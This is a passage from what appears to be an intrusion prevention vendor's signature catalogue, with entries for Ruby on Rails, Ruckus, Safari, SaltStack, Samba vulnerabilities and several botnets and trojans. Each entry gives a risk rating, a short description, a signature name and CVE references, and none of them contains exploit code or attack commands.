http://www.osvdb.org/89642
Back to top

Ruby-On-Rails-Directory-Traversal-CVE-2014-0130

About this vulnerability: A vulnerability in Ruby On Rails
Risk: High
First detected in: sgpkg-ips-1668-5242
Last changed: sgpkg-ips-1668-5242
Platform: Generic
Software: Ruby on Rails
Type: Input Validation
Description: A directory traversal vulnerability in Ruby on Rails may allow unauthenticated attackers to read arbitrary files on the target server.
Situation: HTTP_CSU-Multiple-Directory-Traversal-Vulnerabilities
References:
CVE-2014-0130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0130
Back to top

Ruby-On-Rails-Dynamic-Render-File-Upload-Remote-Code-Execution

About this vulnerability: An attempt to exploit a Ruby on Rails Dynamic Render File Upload Remote Code Execution vulnerability detected
Risk: High
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ruby on Rails
Type: Code Injection
Description: A vulnerability in Ruby on Rails, multiple versions, which allows remote attackers to execute remote code via local file inclusion.
Situation: HTTP_CRL-Ruby-On-Rails-Dynamic-Render-File-Upload-Remote-Code-Execution
References:
CVE-2016-0752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0752
Back to top

Ruby-On-Rails-File-Content-Disclosure

About this vulnerability: A vulnerability in Ruby On Rails
Risk: High
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ruby on Rails
Type: Malfunction
Description: There is a file content disclosure vulnerability in Ruby On Rails. Successful exploitation of this vulnerability could lead in file content disclosure.
Situation: HTTP_CRH-Ruby-On-Rails-File-Content-Disclosure
References:
CVE-2019-5418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5418
Back to top

Ruby-On-Rails-JSON-Parse-Heap-Based-Buffer-Overflow

About this vulnerability: A Ruby On Rails JSON Parse Heap Based Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1720-5242
Platform: Generic
Software: Ruby on Rails
Type: Malfunction
Description: A vulnerability in Ruby On Rails, versions 1.8, 1.9 before 1.9.3-p484, 2.0 before 2.0.0-p353, 2.1 before 2.1.0 preview2, which allows remote attackers to cause a denial of service condition or execute arbitrary code via a string that is converted to a floating point value using the to_f method or JSON.parse.
Situation: File-Text_Ruby-On-Rails-JSON-Parse-Heap-Based-Buffer-Overflow
References:
CVE-2013-4164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4164
OSVDB-100113
http://www.osvdb.org/100113
Back to top

Ruby-On-Rails-JSON-Processor-YAML-Deserialization-Code-Execution

About this vulnerability: A vulnerability in Ruby on Rails JSON Processor YAML deserialization
Risk: High
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ruby on Rails
Type: Code Injection
Description: There is a vulnerability in the JSON code for Ruby on Rails which allows attackers to bypass authentication systems, inject arbitrary SQL, inject and execute arbitrary code, or perform a DoS attack on a Rails application.
Situation: HTTP_CS-Ruby-On-Rails-JSON-Processor-YAML-Deserialization-Code-Execution
References:
CVE-2013-0333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0333
BID-57575
http://www.securityfocus.com/bid/57575
OSVDB-89594
http://www.osvdb.org/89594
Back to top

Ruby-On-Rails-Secret_Key_Base-Vulnerability

About this vulnerability: A vulnerability in Ruby on Rails
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ruby on Rails
Type: Input Validation
Description: A vulnerability in Ruby on Rails, versions 5.2 and before, which allows remote attackers to execute arbitrary code due to insecure authentication and user input validation.
Situation: HTTP_CRL-Ruby-On-Rails-Secret_Key_Base-Vulnerability
References:
CVE-2019-5420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5420
Back to top

Ruby-On-Rails-Where-Hash-SQL-Injection

About this vulnerability: A vulnerability in The Ruby on Rails Project Ruby on Rails
Risk: Moderate
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ruby on Rails
Type: Input Validation
Description: A vulnerability has been discovered in Ruby on Rails. The vulnerability is due to an improper input validation error while handling hash values. A remote attacker could exploit this vulnerability by sending malicious SQL code as part of the vulnerable parameter via a specially crafted URL, possibly leading to manipulation of data in the database or information disclosure.
Situation: HTTP_CRL-Ruby-On-Rails-Where-Hash-SQL-Injection
References:
CVE-2012-2695
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2695
OSVDB-82403
http://www.osvdb.org/82403
Back to top

Ruby-On-Rails-XML-Parameter-Parsing-Vulnerability

About this vulnerability: A vulnerability in Ruby on Rails XML-parameter parsing
Risk: High
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ruby on Rails
Type: Code Injection
Description: An object-injection vulnerability exists in most web applications developed using Ruby on Rails framework versions lower than 4.0. By forging a malicious POST-request, an attacker can inject malicious code in an unpatched target system.
Situation: HTTP_CS-Ruby-On-Rails-XML-Parameter-Parsing-Vulnerability
References:
CVE-2013-0156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0156
BID-57187
http://www.securityfocus.com/bid/57187
OSVDB-89026
http://www.osvdb.org/89026
Back to top

Ruby-Saml-Authentication-Bypass-CVE-2024-45409

About this vulnerability: An attempt to exploit a vulnerability in ruby-saml detected
Risk: High
First detected in: sgpkg-ips-1850-5242
Last changed: sgpkg-ips-1850-5242
Platform: Generic
Software: ruby-saml
Type: Input Validation
Description: The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within the vulnerable system. This vulnerability is fixed in 1.17.0 and 1.12.3.
Situation: HTTP_CRL-Saml-XML-Signature-Wrapping
References:
CVE-2024-45409
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45409
Back to top

Ruby-Saml-Authentication-Bypass-CVE-2025-25291

About this vulnerability: An attempt to exploit a vulnerability in ruby-saml detected
Risk: High
First detected in: sgpkg-ips-1850-5242
Last changed: sgpkg-ips-1850-5242
Platform: Generic
Software: ruby-saml
Type: Input Validation
Description: ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. An authentication bypass vulnerability was found in versions prior to versions 1.12.4 and 1.18.0 due to a parser differential. ReXML and Nokogiri are used by ruby-saml, which parse XML differently. As a result, the parsers can generate entirely different document structures from the same XML input. That allows an attacker to be able to execute a signature wrapping attack, leading to authentication bypass.
Situation: HTTP_CRL-Saml-XML-Signature-Wrapping
References:
CVE-2025-25291
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25291
Back to top

Ruby-Saml-Authentication-Bypass-CVE-2025-25292

About this vulnerability: An attempt to exploit a vulnerability in ruby-saml detected
Risk: High
First detected in: sgpkg-ips-1850-5242
Last changed: sgpkg-ips-1850-5242
Platform: Generic
Software: ruby-saml
Type: Input Validation
Description: ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. An authentication bypass vulnerability was found in versions prior to versions 1.12.4 and 1.18.0 due to a parser differential. ReXML and Nokogiri are used by ruby-saml, which parse XML differently. As a result, the parsers can generate entirely different document structures from the same XML input. That allows an attacker to be able to execute a signature wrapping attack, leading to authentication bypass.
Situation: HTTP_CRL-Saml-XML-Signature-Wrapping
References:
CVE-2025-25292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25292
Back to top

Ruby-Saml-XMLSecurity-DOCTYPE-Authentication-Bypass-CVE-2025-25291

About this vulnerability: A vulnerability in SAML-Toolkits ruby-saml
Risk: Moderate
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Platform: Generic
Software: GitLab
Type: Malfunction
Description: The difference in how the XML DOCTYPE data is handled by parsers used within the library causes an authentication bypass vulnerability in Gitlab and other softare using Ruby-SAML. A successful exploitation allows an attacker to take over accounts on the target system.
Situation: HTTP_CRL-Ruby-Saml-XMLSecurity-DOCTYPE-Authentication-Bypass-CVE-2025-25291
References:
CVE-2025-25291
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25291
Back to top

Ruby-WEBrick-Denial-Of-Service

About this vulnerability: A Ruby WEBrick Denial Of Service vulnerability.
Risk: High
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WEBrick
Type: Insecure Configuration
Description: A vulnerability in WEBrick, in Ruby, in multiple versions, which allows remote attackers to cause a denial of service condition via a crafted HTTP request that is processed by a backtracking regular expression.
Situation: HTTP_CSH-Ruby-WEBrick-Denial-Of-Service
References:
CVE-2008-3656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3656
BID-30644
http://www.securityfocus.com/bid/30644
OSVDB-47471
http://www.osvdb.org/47471
Back to top

Ruckus-Iot-Controller-Web-UI-Authentication-Bypass-Vulnerability

About this vulnerability: A vulnerability in Ruckus IoT Controller
Risk: High
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ruckus IoT Controller
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in Ruckus IoT Controller Web UI. The vulnerability is due to improperly handling of a crafted HTTP request. A remote attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation could allow the attacker to bypass authentication. This situation may produce false positives since the hard-coded token may also be used in non-attack scenarios.
Situation: HTTP_CRH-Ruckus-Iot-Controller-Web-UI-Authentication-Bypass-Vulnerability
References:
CVE-2020-26879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26879
Back to top

Ruckus-Iot-Controller-Web-UI-Createuser-Remote-Command-Injection

About this vulnerability: A vulnerability in Ruckus IoT Controller
Risk: High
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1298-5242
Platform: Generic
Software: Ruckus IoT Controller
Type: Input Validation
Description: An remote command injection vulnerability has been reported in Ruckus IoT Controller Web UI. The vulnerability is due to improperly handling of a crafted HTTP request. A remote authenticated attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation could lead to arbitrary command execution in the context of the root user.
Situation: File-Text_Ruckus-Iot-Controller-Web-UI-Createuser-Remote-Command-Injection
References:
CVE-2020-26878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26878
Back to top

Ruckus-Wireless-Admin-Remote-Code-Execution-CVE-2023-25717

About this vulnerability: A vulnerability in Ruckus Wireless Admin
Risk: High
First detected in: sgpkg-ips-1584-5242
Last changed: sgpkg-ips-1584-5242
Platform: Generic
Software: Ruckus Wireless Admin
Type: Input Validation
Description: A remote code execution vulnerability has been reported in Ruckus Wireless Admin, versions up to and including 10.4.
Situation: HTTP_CSU-Ruckus-Wireless-Admin-Remote-Code-Execution-CVE-2023-25717
References:
CVE-2023-25717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25717
Back to top

Rudder-Server-SQLi-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in RudderStack detected
Risk: High
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Platform: Unix
Software: RudderStack
Type: Input Validation
Description: A vulnerability in RudderStack's rudder-server, versions prior to 1.3.0-rc.1, which allows remote attackers to execute arbitrary SQL commands via the source_id parameter to the pending-events and failed-events endpoints.
Situation: HTTP_CRL-Rudder-Server-SQLi-Remote-Code-Execution
References:
CVE-2023-30625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30625
Back to top

Rugged-Director-Denial-Of-Service

About this vulnerability: A vulnerability in Rugged Director ROS allowing denial of service.
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Rugged Director
Type: Malfunction
Description: A vulnerability exists in Rugged Director ROS where an attacker can send custom UDP packets causing a denial of service condition.
Situation: Generic_UDP-Rugged-Director-Denial-Of-Service
Back to top

Rustdoor-Command-and-Control-Traffic

About this vulnerability: Rustdoor command and control traffic
Risk: High
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Platform: Windows; Mac OS
Software: <os>
Type: Backdoor
Description: An HTTP request that matches a known Rustdoor command and control traffic pattern was detected. Rustdoor's capabilities include collecting and exfiltrating information and downloading additional files.
Situation: HTTP_CS-Rustdoor-Command-and-Control-Traffic
Back to top

Rustock-Bot

About this vulnerability: Rustock Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Rustock is a Botnet used for sending spam messages.
Situation: HTTP_CS-Rustock-Bot-Traffic
Back to top

Rustock-Spambot

About this vulnerability: Rustock spambot is a template-based spamming engine
Risk: High
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Rustock spambot
Type: Backdoor
Description: Rustock spambot is a template-based spamming engine. Rustock spambot uses a rootkit to hide itself on the infected host.
Situation: HTTP_CS-Rustock-Spambot
Back to top

RX-Toolbar

About this vulnerability: RX Internet Explorer toolbar
Risk: Low
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RX Toolbar
Type: Misconfiguration
Description: RX Toolbar is an Internet Explorer toolbar that provides links and searching for advertising purposes. It is bundled with KaZaa and may be considered unwanted software by some organizations.
Situation: HTTP_CSH-RX-Toolbar-Activity
Back to top

Saefko-RAT-C2-Traffic

About this vulnerability: Saefko RAT C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Saefko is a remote access trojan that can be used to control the infected system.
Situation: HTTP_CSU-Saefko-RAT-C2-Traffic
Back to top

Safari-In-Operator-Side-Effect-Exploit

About this vulnerability: An attempt to exploit a vulnerability in Safari
Risk: High
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Platform: OS X
Software: Safari
Type: Type Confusion
Description: There exists a vulberability in Safari, versions before 13.1.1, which allows remote attackers to execute arbitrary code due to a type confusion caused by a side-effect of the 'in' operator and the <embed> element with the PDF plugin.
Situation: File-Text_Safari-In-Operator-Side-Effect-Exploit
References:
CVE-2020-9850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9850
Back to top

Safari-Stack-Based-Out-Of-Bounds

About this vulnerability: An attempt to exploit a vulnerability in Safari detected
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Generic
Software: Safari
Type: Malfunction
Description: An attempt to exploit a vulnerability in Safari detected.
Situation: File-TextId_Safari-Stack-Based-Out-Of-Bounds
References:
CVE-2020-27930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27930
Back to top

Safari-Webkit-Jit-Exploit-For-iOS

About this vulnerability: An attempt to exploit a vulnerability in Safari Webkit JIT
Risk: High
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Platform: OS X
Software: Safari
Type: Malfunction
Description: There exists a vulberability in Safari Webkit JIT, multiple versions, which allows remote attackers to write shellcode to an RWX memory section in JavaScriptCore and execute it.
Situation: File-Text_Safari-Webkit-Jit-Exploit-For-iOS
References:
CVE-2016-4669
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4669
Back to top

Safenet-HASP-SL-ActiveX-Control-ChooseFilePath-Buffer-Overflow

About this vulnerability: A vulnerability in SafeNet Privilege SCP (HASP SL)
Risk: Moderate
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SafeNet Privilege SCP
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in SafeNet HASP SL's ActiveX control. The vulnerability is due to insufficient input validation while handling parameters to the ChooseFilePath() function. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to access a malicious web site. This can lead to code execution in the context of the affected user.
Situation: File-Text_Safenet-HASP-SL-ActiveX-Control-ChooseFilePath-Buffer-Overflow
References:
BID-56297
http://www.securityfocus.com/bid/56297
OSVDB-86723
http://www.osvdb.org/86723
Back to top

Safenet-Softremote-Stack-Based-Buffer-Overflow

About this vulnerability: Safenet Softremote Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SafeNet SoftRemote
Type: Buffer Overflow
Description: An stack based buffer overflow vulnerability in SafeNet SoftRemote, before version 10.8.6, which allows attackers to remotly execute arbitrary code via a long UDP request.
Situation: Generic_UDP-Safenet-Softremote-Stack-Based-Buffer-Overflow
References:
CVE-2009-1943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1943
BID-35154
http://www.securityfocus.com/bid/35154
OSVDB-54831
http://www.osvdb.org/54831
Back to top

Sage-Saleslogix-GetConnection-Account-Disclosure

About this vulnerability: Sage SalesLogix GetConnection Account Disclosure
Risk: Moderate
First detected in: sgpkg-ips-507-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SalesLogix
Type: Script Injection
Description: A bug exists in Sage SalesLogix CRM 6.1 allowing remote attacker to potentially query for password without authentication.
Situation: Generic_CS-Sage-Saleslogix-GetConnection-Account-Disclosure
References:
CVE-2004-1611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1611
BID-11450
http://www.securityfocus.com/bid/11450
OSVDB-10948
http://www.osvdb.org/10948
OSVDB-10947
http://www.osvdb.org/10947
Back to top

Sage-X3-Administration-Service-Authentication-Bypass-Command-Execution

About this vulnerability: A vulnerability in Sage X3.
Risk: High
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Platform: Windows
Software: Sage X3
Type: Insecure Configuration
Description: A vulnerability in Sage X3, versions before 93.2.53, which allows remote attackers to execute arbitrary commands by allowing the discovery of the installation path, CVE-2020-7387, and allowing an authentication bypass and file upload, which contains the malicious commands, to that location CVE-2020-7388.
Situation: Generic_CS-Sage-X3-Administration-Service-Authentication-Bypass-Command-Execution
References:
CVE-2020-7388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7388
Back to top

Sagem-Fast-3304-V1-Denial-Of-Service

About this vulnerability: Sagem Fast 3304-V1 Denial Of Service Vulnerability
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAGEM 3304
Type: Malfunction
Description: A denial of service vulnerability in SubmitMaintCONFIG, via the ACTION parameter, which allows an attacker to specially craft a request causing a system reboot or reset.
Situation: HTTP_CSU-Sagem-Fast-3304-V1-Denial-Of-Service
Back to top

SAGEM-Fast-Routers-3304-3464-3504-Authentication-Bypass

About this vulnerability: A vulnerability in SAGEM routers 3304/3464/3504
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAGEM 3304; SAGEM 3464; SAGEM 3504
Type: Malfunction
Description: There is an authentication bypass vulnearbility in Sagem Fast routers 3304/3464/3504.
Situation: Telnet_CS-SAGEM-Router-Fast-3304-3464-3504-Authentication-Bypass
Back to top

Saint-Bot-Infection-Traffic

About this vulnerability: Saint Bot malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Saint Bot infection traffic was detected.
Situation: File-Text_Saint-Bot-Infection-Traffic
Back to top

SalesAgility-SuiteCRM-Email_recipients-Remote-Code-Execution

About this vulnerability: A vulnerability in SalesAgility SuiteCRM.
Risk: High
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1462-5242
Platform: Generic
Software: SalesAgility
Type: Input Validation
Description: A vulnerability in SalesAgility SuiteCRM, versions SuiteCRM 7.12.4 and prior, SuiteCRM-Core 8.0.3 and prior, which allows remote attackers to execute arbitrary code by sending a crafted request, due to the improper input validation for the email_recipients propery.
Situation: HTTP_CS-SalesAgility-SuiteCRM-Email_recipients-Remote-Code-Execution
References:
CVE-2022-23940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23940
Back to top

Saleslogix-Eviewer-Admin-Command

About this vulnerability: SalesLogix eViewer slxweb.dll admin command
Risk: High
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-1636-5242
Platform: Windows
Software: SalesLogix
Type: Malfunction
Description: SalesLogix eViewer allows unauthorized access to the slxweb.dll that can be requested to perform commands. The server runs with administrative privileges and the slxweb.dll cannot be moved.
References:
CVE-2000-0278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0278
BID-1089
http://www.securityfocus.com/bid/1089
Back to top

Sality-Virus

About this vulnerability: Sality virus
Risk: High
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Sality is a virus which infects shared drives and Windows executable files. It contains downloader functionality to further install Trojan or key logger components. Sality opens a backdoor that allow the remote attacker o get the full control over the infected computer and in turn the confidential information, representing a serious security risk.
Situation: HTTP_CS-Sality-Botnet-Activity
HTTP_CSH-Sality-Virus-User-Agent
Back to top

SaltStack-Salt-API-SSH-Client-Command-Injection

About this vulnerability: A vulnerability in SaltStack Salt
Risk: Moderate
First detected in: sgpkg-ips-1315-5242
Last changed: sgpkg-ips-1315-5242
Platform: Generic
Software: SaltStack Salt
Type: Input Validation
Description: Improper sanitization of URL parameters causes a command injection vulnerability in Salt. A succesful exploit allows a remote attacker to execute arbitrary code on the target system with the privileges of the target process, which is often root.
Situation: HTTP_CRL-SaltStack-Salt-API-SSH-Client-Command-Injection
File-Text_SaltStack-Salt-API-SSH-Client-Command-Injection
References:
CVE-2020-16846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16846
Back to top

SaltStack-Salt-Authorization-Bypass

About this vulnerability: A vulnerability in Saltstack Salt Authorization Bypass
Risk: High
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SaltStack Salt
Type: Malfunction
Description: There exists an authorization bypass vulnerability in SaltStack Salt framework. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_CS-SaltStack-Salt-Authorization-Bypass
References:
CVE-2020-11651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11651
Back to top

SaltStack-Salt-Clearfuncs-Directory-Traversal

About this vulnerability: A vulnerability in SaltStack Salt
Risk: Moderate
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SaltStack Salt
Type: Directory Traversal
Description: Improper path sanitization causes a directory traversal vulnerability in Salt. A successful exploit may allow an attacker to write to arbitrary locations on the target systen and thus gain the ability to execute arbitrary code thereon.
Situation: Generic_CS-SaltStack-Salt-Clearfuncs-Directory-Traversal
References:
CVE-2020-11652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11652
Back to top

SaltStack-Salt-Salt.wheel.pillar_roots.write-Method-Directory-Traversal

About this vulnerability: A vulnerability in SaltStack Salt
Risk: Moderate
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Platform: Generic
Software: SaltStack Salt
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in the SaltStack Salt. Successful exploitation could lead in arbitrary file creation or code execution.
Situation: HTTP_CRL-SaltStack-Salt-Salt.wheel.pillar_roots.write-Method-Directory-Traversal
References:
CVE-2021-25282
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25282
Back to top

Samba-DCE-RPC-IDL-Parser-Out-Of-Bounds-Array-Access

About this vulnerability: A vulnerability in Samba
Risk: Moderate
First detected in: sgpkg-ips-449-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Malfunction
Description: An out-of-bounds array access leading to heap memory corruption has been reported in Samba. The vulnerability is due to an error in Samba's RPC code generator. A remote, unauthenticated attacker could exploit this vulnerability by sending malicious Server Message Block (SMB) traffic to a vulnerable server. A successful exploitation attempt may result in the execution of arbitrary code as the 'root' user.
Situation: MSRPC-TCP_Samba-DCE-RPC-IDL-Parser-Out-Of-Bounds-Array-Access
MSRPC-TCP_Samba-IDL-Parser-Out-Of-Bounds-Array-EventLog
MSRPC-TCP_Samba-IDL-Parser-Out-Of-Bounds-Array-LsarLookupNames3
MSRPC-TCP_Samba-IDL-Parser-Out-Of-Bounds-Array-Vulnerable-Function-Call
MSRPC-TCP_Samba-IDL-Parser-Out-Of-Bounds-Array-SetInfoPolicy
References:
CVE-2012-1182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182
BID-52973
http://www.securityfocus.com/bid/52973
Back to top

Samba-DNS-Reply-Flag-Denial-Of-Service

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Moderate
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Malfunction
Description: A denial of service vulnerability exists in Samba's internal DNS server. The server fails to check the reply flag of DNS packets, making it vulnerable to reply to a spoofed reply. This could result in a "ping-pong" type attack where two vulnerable servers attack each other. An attacker could exploit this vulnerability by sending a DNS query to a vulnerable server with a spoofed source IP address of another vulnerable server. Successful exploitation could result in excessive consumption of resources on both vulnerable servers, possibly causing a denial of service condition.
Situation: DNS-UDP_Samba-DNS-Reply-Flag-Denial-Of-Service
References:
CVE-2014-0239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0239
OSVDB-107484
http://www.osvdb.org/107484
Back to top

Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service

About this vulnerability: A vulnerability in Samba Team Samba
Risk: High
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Resource Starvation
Description: A denial of service vulnerability has been reported in Samba. The vulnerability is due to insufficient handling of deeply nested filters in LDAP requests. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted LDAP requests to the target service. Successful exploitation could result in the exhaustion of the stack, causing the Samba process to terminate.
Situation: LDAP_CS-Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service
LDAP-UDP_Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service
References:
CVE-2020-10704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10704
Back to top

Samba-LDAP-Ad-Dc-Paged-Search-DoS

About this vulnerability: A vulnerability in Samba
Risk: Moderate
First detected in: sgpkg-ips-1190-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Malfunction
Description: A vulnerability in Samba, vesions 4.10.x prior to 4.10.5, which allows remote attackers to cause a denial of service condition by sending a crafted LDAP request to a vulnerable server, due to improper processing of paged LDAP searches when Samba is configured as an Active Directory Domain Controller.
Situation: LDAP_CS-Samba-LDAP-Ad-Dc-Paged-Search-DoS
References:
CVE-2019-12436
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12436
Back to top

Samba-LDAP-Ad-Dc-Privilege-Escalation

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Moderate
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Malfunction
Description: There has been reported a privilege escalation vulnerability in Samba. Permissions aren't properly validated, when Samba is Active Directory Domain Controller, which could allow authenticated attackers to change other users' passwords.
Situation: LDAP_CS-Samba-LDAP-Ad-Dc-Privilege-Escalation
References:
CVE-2018-1057
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1057
Back to top

Samba-LDAP-Server-Libldb-Infinite-Loop-Denial-Of-Service

About this vulnerability: A vulnerability in Samba Team Samba
Risk: Moderate
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Infinite Loop
Description: Crafted packets may be used to trigger a parsing error which causes an infinite loop and results in a denial of service condition.
Situation: LDAP_CS-Samba-LDAP-Server-Libldb-Infinite-Loop-Denial-Of-Service
References:
CVE-2015-3223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3223
Back to top

Samba-LSA-RPC-LsaIoTransNames-Request-Handling-Heap-Overflow

About this vulnerability: A vulnerability in Samba Team Samba
Risk: High
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability exists in the way Samba handles RPC messages. The vulnerability is due to a boundary error while performing specific RPC operations. Remote authenticated attackers can exploit this vulnerability by sending a specially crafted RPC request to the LSA RPC interface. Successful exploitation of this vulnerability allows attackers to execute arbitrary code on the vulnerable system in the context of the affected process. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected process, commonly the Unix account mapped for the SMB user. In an attack case where code injection is not successful, if Samba server is running in daemon mode, the child process that handles the attacker's connection will not terminate.
Situation: MSRPC-TCP_CPS-Samba-LSA-RPC-LsaIoTransNames-Request-Handling-Heap-Overflow
References:
CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446
BID-23973
http://www.securityfocus.com/bid/23973
Back to top

Samba-LSA-RPC-LsarAddPrivilegesToAccount-Crafted-Request-Handling-Heap-Overflow

About this vulnerability: A vulnerability in Samba
Risk: High
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samba
Type: Buffer Overflow
